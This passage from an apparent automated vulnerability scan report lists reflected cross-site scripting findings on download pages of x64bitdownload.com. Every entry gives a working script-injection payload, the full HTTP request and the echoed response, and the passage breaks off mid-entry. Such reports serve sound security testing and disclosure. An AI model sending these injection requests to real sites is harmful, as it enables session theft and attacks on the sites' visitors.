1.233. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528e0"><script>alert(1)</script>cb345b92cc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html?528e0"><script>alert(1)</script>cb345b92cc2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-communitymate-download-qeakzpwv.html?528e0"><script>alert(1)</script>cb345b92cc2=1"/>
...[SNIP]...

1.234. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5108"><script>alert(1)</script>438beac92ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse5108"><script>alert(1)</script>438beac92ff/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse5108"><script>alert(1)</script>438beac92ff/t-64-bit-cyberlink-youcam-download-gspvirzx.html" />
...[SNIP]...

1.235. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f07"><script>alert(1)</script>b0b929cccfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html14f07"><script>alert(1)</script>b0b929cccfa HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html14f07"><script>alert(1)</script>b0b929cccfa"/>
...[SNIP]...

1.236. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2918"><script>alert(1)</script>0c97ca17470 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html?b2918"><script>alert(1)</script>0c97ca17470=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html?b2918"><script>alert(1)</script>0c97ca17470=1"/>
...[SNIP]...

1.237. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12bf9"><script>alert(1)</script>6fe8131d792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads12bf9"><script>alert(1)</script>6fe8131d792/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads12bf9"><script>alert(1)</script>6fe8131d792/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html" />
...[SNIP]...

1.238. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742ce"><script>alert(1)</script>f2561d7c8fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html742ce"><script>alert(1)</script>f2561d7c8fe HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html742ce"><script>alert(1)</script>f2561d7c8fe"/>
...[SNIP]...

1.239. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bbf"><script>alert(1)</script>75abb52cf6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html?e6bbf"><script>alert(1)</script>75abb52cf6c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html?e6bbf"><script>alert(1)</script>75abb52cf6c=1"/>
...[SNIP]...

1.240. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8bd"><script>alert(1)</script>2073222b13b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsfe8bd"><script>alert(1)</script>2073222b13b/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsfe8bd"><script>alert(1)</script>2073222b13b/t-64-bit-easytether-x64-download-byhsbuvf.html" />
...[SNIP]...

1.241. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d668a"><script>alert(1)</script>fda2f2d8370 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.htmld668a"><script>alert(1)</script>fda2f2d8370 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-easytether-x64-download-byhsbuvf.htmld668a"><script>alert(1)</script>fda2f2d8370"/>
...[SNIP]...

1.242. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b318"><script>alert(1)</script>59af2c6b207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html?2b318"><script>alert(1)</script>59af2c6b207=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:16 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html?2b318"><script>alert(1)</script>59af2c6b207=1"/>
...[SNIP]...

1.243. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6632"><script>alert(1)</script>c0725bae4aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsd6632"><script>alert(1)</script>c0725bae4aa/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsd6632"><script>alert(1)</script>c0725bae4aa/t-64-bit-messenger-plus-live-download-upxgwatv.html" />
...[SNIP]...

1.244. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 583a5"><script>alert(1)</script>95c1c196d99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html583a5"><script>alert(1)</script>95c1c196d99 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html583a5"><script>alert(1)</script>95c1c196d99"/>
...[SNIP]...

1.245. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978a2"><script>alert(1)</script>f39f418527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html?978a2"><script>alert(1)</script>f39f418527=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html?978a2"><script>alert(1)</script>f39f418527=1"/>
...[SNIP]...

1.246. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e02"><script>alert(1)</script>f78bbafec09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads87e02"><script>alert(1)</script>f78bbafec09/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads87e02"><script>alert(1)</script>f78bbafec09/t-64-bit-news-file-grabber-download-stclytop.html" />
...[SNIP]...

1.247. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6727"><script>alert(1)</script>351fce78751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.htmlc6727"><script>alert(1)</script>351fce78751 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-news-file-grabber-download-stclytop.htmlc6727"><script>alert(1)</script>351fce78751"/>
...[SNIP]...

1.248. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70863"><script>alert(1)</script>1a306d3759b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html?70863"><script>alert(1)</script>1a306d3759b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-news-file-grabber-download-stclytop.html?70863"><script>alert(1)</script>1a306d3759b=1"/>
...[SNIP]...

1.249. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 479d7"><script>alert(1)</script>109565655ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads479d7"><script>alert(1)</script>109565655ac/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads479d7"><script>alert(1)</script>109565655ac/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html" />
...[SNIP]...

1.250. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

